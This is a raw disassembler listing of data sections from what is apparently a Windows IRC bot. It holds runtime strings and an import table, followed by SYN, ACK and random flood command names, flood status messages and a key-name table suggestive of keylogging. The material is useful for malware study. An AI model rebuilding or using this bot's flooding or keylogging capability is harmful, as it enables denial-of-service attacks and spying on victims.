a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_41AB9C+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_41AB9C+4F�o
align 10h
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 4
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 4
aLdexp db 'ldexp',0
align 4
aModf db 'modf',0
align 4
aFabs db 'fabs',0
align 4
aFloor db 'floor',0
align 4
aCeil db 'ceil',0
align 4
aTan db 'tan',0
aCos db 'cos',0
aSin db 'sin',0
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aAtan db 'atan',0
align 4
aAcos db 'acos',0
align 10h
aAsin db 'asin',0
align 4
aTanh db 'tanh',0
align 10h
aCosh db 'cosh',0
align 4
aSinh db 'sinh',0
align 10h
aLog10 db 'log10',0
align 4
aLog db 'log',0
aPow db 'pow',0
aExp db 'exp',0 ; DATA XREF: _2:off_435EBC�o
align 8
dbl_424818 dq 0.0 ; DATA XREF: sub_41C2F3+8C�r
; sub_41C2F3+AC�r ...
dbl_424820 dq 4.195835e6 ; DATA XREF: sub_41C808+F�r
dbl_424828 dq 3.145727e6 ; DATA XREF: sub_41C808+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_41C846+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_41C846�o
align 4
aE000 db 'e+000',0 ; DATA XREF: sub_41C96D+93�o
align 10h
dword_424860 dd 0FFFFFFFFh, 41D058h, 41D062h, 0 ; DATA XREF: sub_41CFF1+5�o
dword_424870 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D120+5�o
dd offset loc_41D1DE
align 10h
dd offset sub_41D1BC
dd offset sub_41D1C6
dword_424888 dd 0FFFFFFFFh, 41D40Eh, 41D412h, 0 ; DATA XREF: sub_41D256+5�o
dword_424898 dd 0FFFFFFFFh, 41D470h, 41D479h, 0 ; DATA XREF: sub_41D41A+5�o
dword_4248A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D4FC+5�o
dd offset loc_41D54D
align 8
dd offset loc_41D539
dd offset loc_41D53D
dword_4248C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41D552+5�o
dd offset loc_41D5A3
align 10h
dd offset loc_41D58F
dd offset loc_41D593
dword_4248D8 dd 2 dup(0) ; DATA XREF: sub_41E709+36�o
; sub_41FB63+39�o ...
dword_4248E0 dd 0FFFFFFFFh, 41E819h, 41E81Dh, 0FFFFFFFFh, 41E8CDh, 41E8D1h
; DATA XREF: sub_41E709+5�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: _2:off_4362FC�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41F885+119�o
align 4
asc_424BA8 db 0Ah ; DATA XREF: sub_41F885+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41F885+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_41F885+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41F885+7D�o
align 8
dword_424BE8 dd 0FFFFFFFFh, 41FC5Ch, 41FC60h ; DATA XREF: sub_41FB63+5�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTz db 'TZ',0 ; DATA XREF: sub_42094E+A�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_42105F+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_42105F+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_42105F+24�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_4219A9:loc_421A9E�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_4219A9+D8�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_4219A9+C7�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_4219A9+AD�o
align 4
dword_424C88 dd 0FFFFFFFFh, 4223A1h, 4223A5h, 0FFFFFFFFh, 422410h, 422414h
; DATA XREF: sub_4221EA+5�o
dd 424DC4h
off_424CA4 dd offset loc_4227D2 ; DATA XREF: sub_4227AA+8�o
; sub_4227EE+2C�o ...
dd offset sub_4227C5
dd offset sub_4229E6
dd offset dword_424E10
off_424CB4 dd offset sub_42283C ; DATA XREF: sub_4227EE+3A�o
; sub_422858�o ...
dd offset sub_4227C5
dd offset loc_422A22
dword_424CC0 dd 0 ; DATA XREF: sub_4227EE+16�o
; sub_4228C0+16�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_422863+11�o
dd offset dword_424E5C
off_424CE0 dd offset sub_42294B ; DATA XREF: sub_422967�o
; sub_42298A+37�o ...
dd offset sub_4227C5
dd offset loc_422A04
aStringTooLong db 'string too long',0 ; DATA XREF: sub_42298A+11�o
dd offset dword_424EA0
off_424D00 dd offset loc_422AE7 ; DATA XREF: sub_422AD2�o
; _2:off_436A1C�o ...
dd offset dword_424ED0
off_424D08 dd offset loc_422B03 ; DATA XREF: sub_422B1F+8�o
; sub_422B5C+8�o ...
dd offset sub_422BBC
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_422BBC+7�o
align 8
dword_424D28 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_422BC9+E�o
dd 3, 19930520h, 2 dup(0)
dword_424D48 dd 0FFFFFFFFh, 422D7Ah, 422D7Eh, 0FFFFFFFFh, 422DF7h, 422DFBh
; DATA XREF: sub_422C78+5�o
dword_424D60 dd 0FFFFFFFFh, 422FEFh, 422FF3h, 0FFFFFFFFh, 42304Ch, 423050h
; DATA XREF: sub_422F03+5�o
dd 436A1Ch, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_424D90 dd offset off_436A34 ; DATA XREF: _1:00424DA8�o _1:00424DF4�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424D90
dd offset dword_424D60+18h
dword_424DB0 dd 3 dup(0) ; DATA XREF: _1:00424DD4�o
dd 2, 424DA8h, 3 dup(0)
dd offset off_436A34
dd offset dword_424DB0+4
off_424DD8 dd offset off_436A54 ; DATA XREF: _1:00424DF0�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424DD8
dd offset off_424D90
dd offset dword_424D60+18h
dword_424DFC dd 3 dup(0) ; DATA XREF: _1:00424E20�o
dd 3, 424DF0h
dword_424E10 dd 3 dup(0) ; DATA XREF: _1:00424CB0�o
dd offset off_436A54
dd offset dword_424DFC+4
off_424E24 dd offset off_436A74 ; DATA XREF: _1:00424E3C�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424E24
dd offset off_424D90
dd offset dword_424D60+18h
dword_424E48 dd 3 dup(0) ; DATA XREF: _1:00424E6C�o
dd 3, 424E3Ch
dword_424E5C dd 3 dup(0) ; DATA XREF: _1:00424CDC�o
dd offset off_436A74
dd offset dword_424E48+4
off_424E70 dd offset off_436A98 ; DATA XREF: _1:00424E88�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_424E70
dword_424E8C dd 3 dup(0) ; DATA XREF: _1:00424EB0�o
dd 1, 424E88h
dword_424EA0 dd 3 dup(0) ; DATA XREF: _1:00424CFC�o
dd offset off_436A98
dd offset dword_424E8C+4
dd offset dword_424D60+18h
dword_424EB8 dd 4 dup(0) ; DATA XREF: _1:00424EE0�o
dd 1, 424EB4h
dword_424ED0 dd 3 dup(0) ; DATA XREF: _1:00424D04�o
dd offset off_436A1C
dd offset dword_424EB8+8
align 8
dword_424EE8 dd 19930520h, 2, 424F08h, 5 dup(0) ; DATA XREF: _0:loc_4230E7�o
dd 0FFFFFFFFh, 4230D0h, 0
dd offset sub_4230C8
dword_424F18 dd 19930520h, 2, 424F38h, 5 dup(0) ; DATA XREF: _0:loc_423104�o
dd 0FFFFFFFFh, 4230F4h, 0
dd offset loc_4230FC
dword_424F48 dd 19930520h, 2, 424F68h, 1, 424F78h, 3 dup(0) ; DATA XREF: _0:loc_423110�o
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 424F90h, 4 dup(0)
dd offset loc_40477E
dd 0FFFFFFFFh, 42311Ah
dword_424FA8 dd 19930520h, 1, 424FA0h, 5 dup(0) ; DATA XREF: _0:loc_423122�o
dd offset off_436A1C
align 10h
dd 0FFFFFFFFh, 0
dd 0Ch, 422B5Ch, 0
dd offset off_436A34
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch, 422908h, 0
dd offset off_436A54
align 8
dd 0FFFFFFFFh, 0
dword_425010 dd 1Ch, 422972h, 3, 424FFCh, 424FE0h, 424FC4h ; DATA XREF: _1:00425034�o
dword_425028 dd 0 ; DATA XREF: sub_422863+2E�o
; sub_4229E6+4B�o
dd offset sub_422858
dd 0
dd offset dword_425010+8
dd 0FFFFFFFFh, 42312Ch
dword_425040 dd 19930520h, 1, 425038h, 4 dup(0) ; DATA XREF: _0:loc_423134�o
dd 0FFFFFFFFh, 42313Eh
dword_425064 dd 19930520h, 1, 42505Ch, 4 dup(0) ; DATA XREF: _0:loc_423146�o
dd 0FFFFFFFFh, 423150h
dword_425088 dd 19930520h, 1, 425080h, 5 dup(0) ; DATA XREF: _0:loc_423158�o
dd offset off_436A74
align 10h
dd 0FFFFFFFFh, 0
dword_4250B8 dd 1Ch, 4229CEh, 3, 4250A4h, 424FE0h, 424FC4h ; DATA XREF: _1:004250DC�o
dword_4250D0 dd 0 ; DATA XREF: sub_42298A+2E�o
; sub_4229E6+2D�o
dd offset sub_422967
dd 0
dd offset dword_4250B8+8
dd 0FFFFFFFFh, 423162h
dword_4250E8 dd 19930520h, 1, 4250E0h, 4 dup(0) ; DATA XREF: _0:loc_42316A�o
dword_425104 dd 2, 424FE0h, 424FC4h ; DATA XREF: _1:0042511C�o
dword_425110 dd 0 ; DATA XREF: sub_4229E6+F�o
dd offset sub_4227AA
dd 0
dd offset dword_425104
dd 25348h, 0FFFFFFFEh, 0
dd 253B2h, 241D8h, 25350h, 0FFFFFFFEh, 0
dd 253BAh, 241E0h, 25170h, 0FFFFFFFEh, 0
dd 25C2Eh, 24000h, 5 dup(0)
dd 2573Ah, 25C14h, 25C02h, 25BF0h, 25BE0h, 25BD0h, 25BC0h
dd 25BA2h, 25B8Eh, 25B7Eh, 25B6Ch, 25B5Ah, 25B4Ch, 25B3Ch
dd 25B2Ah, 25B10h, 25AF8h, 25ADEh, 25AC4h, 25AA8h, 25A9Ch
dd 253C6h, 253D4h, 253E4h, 253FEh, 2541Ah, 25422h, 25438h
dd 25448h, 2545Eh, 2546Ah, 25478h, 25484h, 25498h, 254A6h
dd 254BCh, 254CCh, 254DCh, 254F2h, 25504h, 25516h, 25526h
dd 25534h, 2554Ah, 25556h, 2556Eh, 25588h, 25598h, 255AAh
dd 255BCh, 255D4h, 255ECh, 25614h, 2562Ch, 2563Ah, 25654h
dd 25666h, 25676h, 25682h, 2568Eh, 256A0h, 256B2h, 256C6h
dd 256D6h, 256E4h, 256F8h, 2570Ah, 2571Ah, 25728h, 2574Ah
dd 25760h, 2576Eh, 2577Ch, 2578Eh, 257AAh, 257C0h, 257D0h
dd 257E6h, 257F6h, 25808h, 2581Ch, 2582Ah, 2583Ah, 25850h
dd 2585Eh, 25874h, 25888h, 25896h, 258ACh, 258B8h, 258C8h
dd 258DAh, 258E6h, 258FAh, 25912h, 25924h, 25938h, 25952h
dd 2596Eh, 2597Ah, 25994h, 259A4h, 259B2h, 259C4h, 259D6h
dd 259E4h, 259FEh, 25A0Ch, 25A1Ah, 25A28h, 25A38h, 25A48h
dd 25A5Ah, 25A66h, 25A76h, 25A86h, 25A92h, 0
dd 2539Ch, 0
dd 80000073h, 80000015h, 80000002h, 8000000Dh, 80000001h
dd 80000016h, 80000034h, 8000000Bh, 80000074h, 80000010h
dd 80000013h, 80000012h, 80000097h, 80000017h, 8000000Ah
dd 80000004h, 80000003h, 80000009h, 0
db 6
align 2
aWnetaddconne_1 db 'WNetAddConnection2A',0
aMpr_dll_0 db 'MPR.dll',0
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
db 'º',0
aExitthread db 'ExitThread',0
align 4
db 0DFh ; ß
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 0A3h ; £
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 2A4h
aQueryperform_1 db 'QueryPerformanceFrequency',0
dw 356h
aSleep_0 db 'Sleep',0
dw 1C1h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 73h ; s
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db 75h ; u
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 2B5h
aReadfile_0 db 'ReadFile',0
align 2
a4 db '4',0
aClosehandle_0 db 'CloseHandle',0
db 0A4h ; ¤
db 3, 57h, 72h
aItefile db 'iteFile',0
db 68h ; h
db 3, 54h, 72h
aAnsactnamedpip db 'ansactNamedPipe',0
aS_1 db 'S',0
aCreatefilea_0 db 'CreateFileA',0
db 90h
db 3
aWaitforsingl_0 db 'WaitForSingleObject',0
db 71h ; q
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aO db 'O',0
aCreateeventa db 'CreateEventA',0
align 4
db 7Dh ; }
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 1E0h
aGettimeformata db 'GetTimeFormatA',0
align 4
db 47h ; G
db 1, 47h, 65h
aTdateformata db 'tDateFormatA',0
align 2
aO_0 db 'o',0
aCreatethread_0 db 'CreateThread',0
align 2
dw 163h
aGetfilesize_0 db 'GetFileSize',0
db 5Eh ; ^
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
db 'Î',0
aFindclose_0 db 'FindClose',0
db 'Å',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 2
db 'Ä',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
db 'Ü',0
aFindnextfile_0 db 'FindNextFileA',0
db 'Ò',0
aFindfirstfil_0 db 'FindFirstFileA',0
align 2
dw 31Bh
aSetfilepoint_0 db 'SetFilePointer',0
align 4
db 51h ; Q
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
aS_2 db '˜',0
aEntercritica_0 db 'EnterCriticalSection',0
align 4
db 24h ; $
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aB db '',0
aDeletecritic_0 db 'DeleteCriticalSection',0
dd 724600F8h, 694C6565h, 72617262h, 1590079h
aGetenvironme_0 db 'GetEnvironmentVariableW',0
dd 654701A0h, 6F725074h, 64644163h, 73736572h, 2520000h
dd 64616F4Ch, 7262694Ch, 41797261h, 2160000h, 70616548h
dd 65657246h, 2100000h, 70616548h, 6F6C6C41h, 1A30063h
dd 50746547h, 65636F72h, 65487373h, 7061h, 69560389h, 61757472h
dd 6575516Ch, 78457972h, 2B80000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1C5h
aGetsysteminfo db 'GetSystemInfo',0
dw 286h
aOpenprocess_0 db 'OpenProcess',0
dd 6547017Fh, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4600F3h
dd 74616D72h, 7373654Dh, 41656761h, 20A0000h, 626F6C47h
dd 6E556C61h, 6B636F6Ch, 2030000h, 626F6C47h, 6F4C6C61h
dd 6B63h, 6E550371h, 5670616Dh, 4F776569h, 6C694666h, 2680065h
dd 5670614Dh, 4F776569h, 6C694666h, 540065h
aCreatefilema_1 db 'CreateFileMappingA',0
align 10h
dd 6553031Fh, 6C694674h, 6D695465h, 1650065h, 46746547h
dd 54656C69h, 656D69h, 72430066h, 65746165h, 636F7250h
dd 41737365h, 0BC0000h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 319h
aSetfileattribu db 'SetFileAttributesA',0
align 10h
db 0D5h ; Õ
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 10h
db 5Ah ; Z
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 291h
aPeeknamedpipe db 'PeekNamedPipe',0
aU db '“',0
aDuplicatehandl db 'DuplicateHandle',0
db 42h ; B
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
aE db 'e',0
aCreatepipe db 'CreatePipe',0
align 2
dw 1E9h
aGetversionex_0 db 'GetVersionExA',0
dw 204h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
db '¹',0
aExitprocess_0 db 'ExitProcess',0
dw 394h
aWidechartomu_0 db 'WideCharToMultiByte',0
dd 65470114h, 6D6F4374h, 65747570h, 6D614E72h, 4165h, 65440083h
dd 6574656Ch, 656C6946h, 1430041h
aGetcurrentpr_1 db 'GetCurrentProcessId',0
aC db 'C',0
aCopyfilea db 'CopyFileA',0
db '`',0
aCreatemutexa db 'CreateMutexA',0
align 4
dd 6554035Fh, 6E696D72h, 54657461h, 61657268h, 26E0064h
dd 65766F4Dh, 656C6946h, 35E0041h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 2EE0000h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 174h
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
db 78h ; x
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 8Eh ; Ž
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 0FCh
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 2
dw 2D7h
aRtlunwind db 'RtlUnwind',0
dw 1E2h
aGettimezoneinf db 'GetTimeZoneInformation',0
align 4
db 0C8h ; È
db 1, 47h, 65h
aTsystemtime db 'tSystemTime',0
db 1Ah
db 2, 48h, 65h
aAprealloc db 'apReAlloc',0
dw 1B7h
aGetstartupinfo db 'GetStartupInfoA',0
db 10h
db 1, 47h, 65h
aTcommandlinea db 'tCommandLineA',0
dw 1E8h
aGetversion db 'GetVersion',0
align 4
db 58h ; X
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 214h
aHeapdestroy db 'HeapDestroy',0
db 12h
db 2, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 383h
aVirtualfree_0 db 'VirtualFree',0
db 81h ;
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 36h ; 6
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 0A7h ; §
db 2, 52h, 61h
aIseexception db 'iseException',0
align 2
dw 21Ch
aHeapsize db 'HeapSize',0
align 2
dw 244h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 245h
aLcmapstringw db 'LCMapStringW',0
align 2
dw 104h
aGetcpinfo db 'GetCPInfo',0
dw 0FDh
aGetacp db 'GetACP',0
align 4
db 93h ; “
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 6Eh ; n
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
db 0F6h ; ö
align 2
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 0F7h
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 55h ; U
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
db 57h ; W
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 324h
aSethandlecount db 'SetHandleCount',0
align 4
dd 654701B9h, 64745374h, 646E6148h, 656Ch, 65470166h, 6C694674h
dd 70795465h, 1BA0065h, 53746547h, 6E697274h, 70795467h
dd 4165h, 654701BDh, 72745374h, 54676E69h, 57657079h, 3370000h
dd 53746553h, 61486474h, 656C646Eh, 0EE0000h, 73756C46h
dd 6C694668h, 66754265h, 73726566h, 34A0000h
aSetunhandled_0 db 'SetUnhandledExceptionFilter',0
db 33h ; 3
db 2, 49h, 73h
aBadreadptr db 'BadReadPtr',0
align 10h
db 30h ; 0
db 2, 49h, 73h
aBadcodeptr db 'BadCodePtr',0
align 10h
db 10h
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 10h
db ':',0
aComparestringa db 'CompareStringA',0
align 2
db ';',0
aComparestringw db 'CompareStringW',0
align 4
db 13h
db 3, 53h, 65h
aTenvironment_1 db 'tEnvironmentVariableA',0
aKernel32_dll_0 db 'KERNEL32.dll',0
db 0
_1 ends
; Section 3. (virtual address 00026000)
; Virtual size : 000A9040 ( 692288.)
; Section size in file : 000A9040 ( 692288.)
; Offset to raw data for section: 00026000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_2 segment para public 'CODE' use32
assume cs:_2
;org 426000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_426000 dd 0 ; DATA XREF: sub_419AB8+1F�o
dd offset sub_4030CC
dd offset sub_40482C
dd offset sub_40484E
dword_426010 dd 0 ; DATA XREF: sub_419AB8+1A�o
dword_426014 dd 0 ; DATA XREF: sub_419AB8+10�o
dd offset sub_418682
dd offset sub_41ECF1
dd offset sub_41FA42
dd offset sub_4208B4
dword_426028 dd 0 ; DATA XREF: sub_419AB8:loc_419AC3�o
dword_42602C dd 0 ; DATA XREF: sub_419B07+65�o
dd offset sub_41FAE7
dword_426034 dd 0 ; DATA XREF: sub_419B07:loc_419B67�o
dword_426038 dd 0 ; DATA XREF: sub_419B07+76�o
dd offset sub_4208C5
dword_426040 dd 4 dup(0) ; DATA XREF: sub_419B07:loc_419B78�o
unk_426050 db 2 ; DATA XREF: sub_401000+5E�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithFloodI db ' Done with flood (%iKB/sec).',0
align 4
unk_426088 db 2 ; DATA XREF: sub_4010B5+302�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 2 dup(64h), 6Fh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSendErrorD_ db ' Send error: <%d>.',0
align 4
aDdos_random db 'ddos.random',0 ; DATA XREF: sub_4010B5:loc_4011E1�o
; sub_40EE72+268F�o
aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_4010B5:loc_4011C5�o
; sub_40EE72+2678�o
align 10h
aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_4010B5+F1�o
; sub_40EE72+2661�o
align 4
unk_4260DC db 2 ; DATA XREF: sub_40144A+397�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDoneWithSFlood db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
unk_42613C db 2 ; DATA XREF: sub_40144A+307�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSendingPa db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
unk_42619C db 2 ; DATA XREF: sub_40144A+12A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aInvalidTargetI db ' Invalid target IP.',0
align 4
unk_4261CC db 2 ; DATA XREF: sub_40144A+C2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSetsockop db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
unk_426214 db 2 ; DATA XREF: sub_40144A:loc_401493�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 69h, 63h, 6Dh
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aErrorSocketFai db ' Error: socket() failed, returned: <%d>.',0
align 4
aSupersynDoneWi db '[SUPERSYN]: Done with flood (%iKB/sec)',0 ; DATA XREF: sub_401831+4B�o
align 10h
dword_426280 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_4019D7+4B�o
dd 2BBBB02h
aDoneWithFloo_0 db ' Done with flood (%iKB/sec).',0
align 4
dword_4262B8 dd 7A026E02h, 201F6D1Fh, 6E797328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401A76+27D�o
dd 2BBBB02h
aSendErrorD__0 db ' Send error: <%d>.',0
dword_4262E4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+4EB�o
dd 2BBBB02h
aDoneWithSFlo_0 db ' Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
dword_426344 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+44F�o
dd 2BBBB02h
aErrorSending_0 db ' Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
aRandom db 'random',0 ; DATA XREF: sub_401D82+312�o
; sub_40EE72+2C3C�o
align 4
aAck db 'ack',0 ; DATA XREF: sub_401D82+2F2�o
; sub_40EE72+2C25�o
aSyn db 'syn',0 ; DATA XREF: sub_401D82+2D2�o
; sub_40EE72+2C0D�o
dword_4263B4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+15F�o
dd 2BBBB02h
aInvalidTarge_0 db ' Invalid target IP.',0
align 4
dword_4263E4 dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+EE�o
dd 2BBBB02h
aErrorSetsock_0 db ' Error: setsockopt() failed, returned: <%d>.',0
align 4
dword_42642C dd 7A026E02h, 201F6D1Fh, 70637428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_401D82+70�o
dd 2BBBB02h
aErrorSocketF_0 db ' Error: socket() failed, returned: <%d>.',0
align 10h
dw 8
unicode 0, <>,0
aB_0: ; DATA XREF: sub_4023A7:loc_40248A�o
unicode 0, <b>,0
dd 62000000h, 2 dup(0)
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
